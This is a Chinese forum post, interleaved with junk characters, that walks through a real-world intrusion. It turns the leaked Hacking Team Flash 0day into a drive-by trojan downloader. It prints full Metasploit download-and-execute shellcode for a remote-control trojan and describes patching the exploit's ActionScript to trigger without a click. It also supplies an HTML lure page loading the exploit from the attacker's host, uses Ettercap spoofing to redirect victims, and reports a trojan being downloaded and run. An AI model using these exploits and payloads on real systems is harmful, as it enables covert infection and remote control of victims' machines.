|
Y( Q$ P! ~9 a6 p& ~
三、flash 0day之手工代码修改制作下载者实例入侵演示 4 i" u3 V: g, R6 O: d
# W6 _9 r' j$ j8 i: ?+ {# ^1 C6 @! K9 p9 T4 a
利用到的工具:
: ]5 ~: G0 C: S& w) n! c
3 A @, Q( P2 a8 R- k- Z/ x/ h$ c+ w/ w
4 A* M% @5 G- F3 T Msf 8 O8 U! l1 [) }) P' s
5 T& _( S- e7 ?% L, x# f% _; O/ a4 W# E1 A% O G
Ettercap + i. l* i* T' v1 r: N
, M; U) P A5 }9 b3 \
$ N" w. H8 o1 E% T Adobe Flash CS6 7 s; O" o$ b9 Q- [' \( D
4 Z( p$ v& S" u$ c2 B( C" `0 T2 [- ^& u5 Z( y; y; W
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 w3 z/ M8 j/ B* i2 q
, D* f+ E8 i6 Q; G; F5 q; n% V5 b, [
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
& S/ i0 ]# P r2 f% T; v9 Q - K6 f) w9 ]0 L0 j! W
9 p' k( _5 U, `3 t& m
如图:
7 [: n2 j; X4 G" P ' \6 Q* _0 S0 p' D7 Y
6 I2 W) Z& P% s
6 i' A/ w% V2 v9 C
1 F4 \ ]+ Q8 ~& \1 u! c3 k5 R1 {% Z0 f: ?" E9 J
 * o/ z9 T2 ^4 i0 i8 M) B
" P% M' v8 m" G8 i
7 x7 g0 i( T. k H 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % F3 U( V: Y+ e0 Z
' u8 S: [% g, i; F8 ~( V5 `; ?/ y. h0 S0 ~" o0 f/ p; w
/ a4 m/ }% S& K4 A
0 x1 M5 P4 e- R' x6 G
/ s: ^3 X6 Z, N) n/ X 
: d9 @8 ~, i1 ~" q# k# b6 j 1 ]8 P' d5 e& ^, E/ L( E
# T4 p% {% |7 v! r9 o 然后执行generate -t dword生成shellcode,如下:
( K" v5 S, r- J. F z* ^
* {: S. x; v) r: b) z; @
4 |1 b5 l' R. I. J. D, A/ T+ [ 
1 \( C0 r5 q$ j( `9 G9 Y! ], L 2 U3 K( b7 z' ~* c
. a4 u$ ^- o7 e2 q$ h
复制代码到文本下便于我们一会编辑flash exp,如下:
3 Q7 r8 A# e' q5 h6 V7 T
& ~5 Y! F# T1 @7 j2 _5 [8 d/ z& f7 s7 Y* ~8 z
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
# w8 i" j3 l6 F2 K+ J. u+ y . ?; Y, X' J# S; V8 E
! t5 d+ r' M8 t) Q' \
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
$ M9 u6 M) s9 {9 u4 V1 K
1 |' r; B! j$ p7 W/ [
6 d% i, y, j$ b- { 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + b* B) ~% ]4 d! _: D) Y4 K# n( x
% [( F7 y0 `1 j5 W$ l
" }8 X6 t# y/ s5 N4 Y, l6 h 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
. w; |; o0 n" e8 O F
0 t, ?" w- ?8 o& V6 h8 ?" ~* Z1 d; V( H# A7 T" Y ~/ g0 n9 X
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
! a; u$ b2 K( L% V1 S/ I ! Z# A( D4 I, H/ K0 e
/ I- u/ G8 N5 Y' C! r/ J 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 9 O( \, a1 a) {# e$ L! e
# {0 \9 ?/ z, Y& f. o0 Z' l& }2 ^! e1 _
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 ?6 v; t; d: j5 ^
4 `6 f$ }* _! h9 Z6 X. D# g7 @; X
( ~& k' [: C+ J# ]
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 Y% Y" ?0 a' a- d
0 h1 t5 ?( r: x0 X( s4 N6 T5 K
9 i: u% ^* ~) N& l! U8 H. A 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 m5 X& r8 ]; W, v# z- t3 z, t
- I j) N% T! \
! Y4 ^( X3 J( A) W 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, $ R* W3 G- j* Z$ `" e/ s6 w# p
" F- Q+ T) Q0 Z. K
7 ^6 Y- h- H% T; E+ k/ u; |
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : G9 L; [/ S* O1 B2 B
& A0 f" [6 ?* U7 x: e/ M+ I" k; y9 N: |$ z) @* V& X
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 n( x; S2 ]$ U" M; a( y( A
" {& f1 J- Q5 Q4 M+ V) Z
1 {5 d" d: e$ ]6 p2 Y 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
- u- U/ v7 G; e5 b ) f, F( Z9 o8 P$ F' s5 X0 z9 s
9 b1 ?+ x: |8 \7 q. t }2 f& g, X* `
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 g& R$ c# Z( ^) y4 [1 H
$ `$ M# w2 _8 I, I' @2 d
+ v& |0 B- J" S. Y ; b2 t7 h( e$ T2 ~. e( T! ^
# ^# d8 L1 M* o0 X6 |
- J" U" u. C& q
4 ^+ a* |! H" C6 z1 F7 U ! B5 T/ _& v2 H1 l/ D
2 H/ ~8 ~' t7 e; c7 K9 ? 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) y3 `% ]: h1 `& r3 _
; J# P, e- L# T3 x
2 H+ O8 w& O2 B/ F1 L* f  9 O1 v& R$ y3 j; ?7 ], x* u! ]9 @
5 l' a3 j+ X5 f9 x. C8 I3 O5 h. I8 c1 H! w. }) L
先修改ShellWin32.as,部分源代码如图:
, m. F3 s4 A& f* z- y e0 G6 K: B
; P6 [: r- f8 a8 Z- R
, b1 K& n- H, E, v% t$ ? 
6 T5 C* ~# K% U! d* D( u : F) Y R$ O: o" p) a
4 x9 p9 b5 C- G6 i* @( a& s/ J5 w 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 ]( A. M! x# {, p
4 ?1 i8 {: {& }9 o5 k
" x Z7 z, e6 e. a% F5 v  $ k6 J9 E8 Q( p( Y2 d* m( s. @
1 h( o7 g6 ^3 Z7 ]/ I9 `5 Q) H# b6 H
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
( G! @8 f) T/ f% Y/ E, Y6 ?" C
: N& A% q2 P9 e0 W
6 m. K8 U2 I1 C 
1 h, Z; v0 T+ E3 p- H) ~: Z
4 C/ d) K# ~6 E0 t% H/ {7 B9 R3 C9 g0 t$ {, {6 t2 o
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 m3 I& z# N0 H8 f, @
6 v+ K8 R0 G( h$ z0 j. F
; k5 d3 a4 q# t7 R5 x . F7 q z3 s" w* r/ J; n
9 _) P4 \) X7 p' ^* ]3 _; B
V/ M+ }3 m9 W5 n- S
( K* j& a: r3 V/ E 1 J( M0 x4 d( `) E* |; R6 D
: x& M4 O% b5 E( j) H" F 
7 ^) E7 \5 O# Q
' D* S7 x7 G& ^/ E
, Y: _# H, ?5 U5 S 然后点保存,下面我们来编译一下,打开 $ d9 w/ m) e3 \1 I; K% s
/ H1 ` B0 W* r/ ~7 U# t
# I. n: Q8 C# G2 z
exp1.fla然后点文件-发布,看看编译没错误
~/ Y. G/ l4 ^' \/ e- _0 O6 P ; }' y; h l7 f% i. r
/ S0 y8 V" o1 G% ], _2 v0 ?
+ t* z* @/ ]+ j2 A
6 j& T& d) [& z( \1 O1 A; F
/ p) s' J# s+ `+ m; j3 k# h7 b
, H) ? u8 e B J' @4 A1 d
4 s1 b; l, j$ @# o1 ^$ E/ [- w: L; F3 K' U' Z
# P7 x$ W$ c/ R0 b9 n6 V- U
7 ]- r! F; v/ p% f3 v8 c
0 I" X9 X5 g2 t# B0 z' X 
% D5 b5 k* L& ]7 d- ], U8 T# _5 M
7 I& {4 Z' `) l( U8 ?+ t" ?% k4 [5 e9 d3 G# Q. g9 h
然后我们把生成的
6 M( Z# |& n8 u9 s: i: r
3 {2 e) c3 t& ~* M3 r9 J* z& u7 G; s' Q# h0 ~2 v+ \
exp1.swf丢到kailinux 的/var/www/html下: 8 w# J8 s- d& c" `: ]+ u& S
2 F" P7 z- L# c' j
+ M6 I! r0 c! a$ z! c
然后把这段代码好好编辑一下 & L! }" K$ ^8 g* x: J4 r+ s
! Q7 ^8 M7 b3 I7 e
y/ D1 A9 \! F
( X9 b6 e. X p0 m
% n `* a8 g$ T/ m. M u% R( n6 e$ ^. I0 z# K- X# C
) n) X# `- v( D* W6 P/ B 8 W8 T% \6 d: P5 O% M+ j
7 H# k( g4 y; D9 c
1 d$ o, k' t: c5 ~: P' c) E% V
6 h6 o3 w. J# U7 e. \
* |$ O4 V) f3 \5 d1 N% x
/ V" g! k; d5 t. O5 ^' z
) A: w/ a3 C9 K1 Y E! N1 K6 W3 ?7 r% b- I1 X- T5 V
7 P: b( f! {& R& ]
6 J6 E& p2 [/ Q5 H4 z: y
+ @$ [* o% E7 e
5 G- Z2 a7 g& [4 k% M7 ~ F9 }8 m; N9 J
) d. Y2 T# w8 ?. w$ N/ L% K
<!DOCTYPE html> : L/ k6 y1 I8 h& G& D$ \
# r i2 ~# Q% ^" Y
- m( T0 s9 R* y6 x( d" T- i0 K- h
<html> 5 V& v* q: v3 {' ^) W& T
* a- d: r5 w) Z6 v* ^! ^( r
N1 J( Y9 q" q <head> ( E: s0 E% J- A1 ]
, l3 X# b3 F. R& a6 |$ R% u* {
2 J4 m* f/ \7 @, x. Z- u- e) q <meta http-equiv="Content-Type" content="text/html;
+ H; v: O' i3 y+ K7 D: D
5 H# a6 V3 K, H; F' `+ ]9 h$ `+ M B9 Z# n
charset=utf-8"/>
3 h4 y8 F( | W) ^. K ' g {& t! ?9 `" d0 Z# _0 s
3 K( U9 u6 b& V& g5 w7 w) f6 B
</head>
/ e: v, u6 o3 v( Q: @$ X ( z+ v- v" [5 [4 D& w/ a
6 p( Z1 ?! u5 i, e. y: I <body>
! e- W) o% G) A {; L- {7 n
& w2 e% f# m+ U3 T- }0 f
) C1 K0 q* ?4 ~! x <h2> Please wait, the requested page is loading...</h2> . L6 Q7 T$ P3 P2 V# K. v
/ Y' L- A1 e/ G; x6 B/ k, P6 b
5 I# e3 ^8 i- z5 J
<br> 0 A! z/ g) v& q" e
# ?* y" _5 C0 l& B o3 a- M
( ?0 {0 c, J1 w; d6 d% O+ l8 D$ p% K
<OBJECT 1 J2 d8 @0 Q K9 H2 ^2 i
+ y2 r8 P: a1 `- V+ L, t( F7 Y8 ^$ H1 P% x1 S
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 7 a1 m- L( U( [5 _
5 {, U# F3 e! E: P. r6 `: Y1 k/ B1 m# M" P3 Q" w) Z& H
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> v- X- @" ` H( W
* |7 T8 E. b' I- ?# l% e
5 K) l9 {# [6 T2 l* t8 F: h </body> ' \5 f+ m" o# @. R" {
$ g* [. b$ v& s+ w: O% i
) Z. D& k, M. t, K1 T0 w <script>
$ A, o* h' ^1 J1 ]- U7 A 1 G0 C. w* }' x8 ?- ?, d& N; {
8 p" z, y& h% A
setTimeout(function () { . I8 I( Y$ ~/ Q" o2 f
' o! f, c h, Z
- ]) Y( G9 C+ D: \* T6 [) t6 v4 y; F
3 j+ m1 @' p9 Q9 }( S' w 3 f/ U# L# e* q8 [4 ?2 P2 L
4 w2 ^+ d; Z! e4 o
window.location.reload();
- c. V; A- y, w$ B* d
2 Q% A& |, b( o8 c9 ?: y8 L
( }7 _' h$ k0 {& d }, 10000); 0 \ D5 V9 I- n9 C) Q9 \) o
6 Y1 u; L' K; W. |) `$ \8 Q }6 Z2 W( m3 g o: V0 m
6 c8 q3 t- |/ k. @, D & Q- A( Y$ ?/ g# F! k
6 |, ]( I3 s/ f+ [. _' G
</script> : i- w2 R7 F5 H4 f
8 A! e) M" v; A7 Y( Z/ Z+ ^! [# I" m9 n8 X8 g
</html> # M/ L) D5 T: Q" r
. g& ]5 V. f5 o7 Q
& C* z- q' q2 k' h' E3 f$ @
$ v0 F2 w+ t, @* X& X + ]: h. ?" c# b. |/ [
6 K) D/ e! l1 V* i0 K7 w 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
4 ?1 ~/ D3 a% o, Y s" j8 X
! ~ Y V/ Z5 t" Q, d( u+ r2 _* t" J+ ]8 G( e& M* S, t0 }& ?
 - Q' B6 _0 G4 |. h
. J. G# W0 k+ X/ P% J+ d& m+ ?. y, g- _- p2 H
5 J8 n/ J" [8 {
9 ]9 Y; b- g) r. Y9 N) z+ A& j
: c/ n+ G' O6 N5 n% v6 v
3 I, X1 q+ s" g" ]3 @ $ u& I! L/ c, P8 j
% t/ D5 t) w9 F, Y
5 V0 q6 v: y2 o ! ], c% X B* v# U# {3 |2 [8 F
2 w( e/ f8 s. f6 {; T2 t 4 @. {5 P- ?4 r, Z6 N
0 u' Z8 G5 X8 k" I3 q% J$ `7 F# A- i5 d1 h3 e# \* c# @
下面我们用ettercap欺骗如图: $ P, L' g5 @' t. K# {+ _, o
3 G( e- Z' t- p$ L' [( r" w; D
# y7 y5 T+ F- ?0 N 
9 k" V! m) p1 i$ q7 T
: A4 g/ R8 \. F6 x9 U
* ]2 Z: P% N0 P/ z/ D% s& n% b" a( \
' k$ q) b. b. R9 z6 V4 v3 ~
' B- f# l2 W6 A m e0 n7 K9 h3 [* P/ u, W
下面我们随便访问个网站看看:
9 _7 a8 I, \. x, s" V% Z; C
5 B( U; e; r6 j; R! a; B: A
4 b" n. E9 W) M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
" i/ I0 [3 q: ^6 v6 Q 9 n4 v+ n4 B ?! p* I. A
- F4 @, m) e0 d1 t& f: b: c' \  * z! |- j' L! L) K) ]- n5 Z6 t) [
1 |2 q8 L0 V7 G0 y2 C" @3 g. t; T
1 ~: t3 ~) J- w L3 a; }& r; q 我们看另一台, 6 L) w# V: m' x0 c8 E
; [: j; c- q$ O- z" `) t
$ L* O$ k# e J. A, L3 i0 {; s3 j 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 5 c ?0 W) K3 k' H/ a9 b- ?, m
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对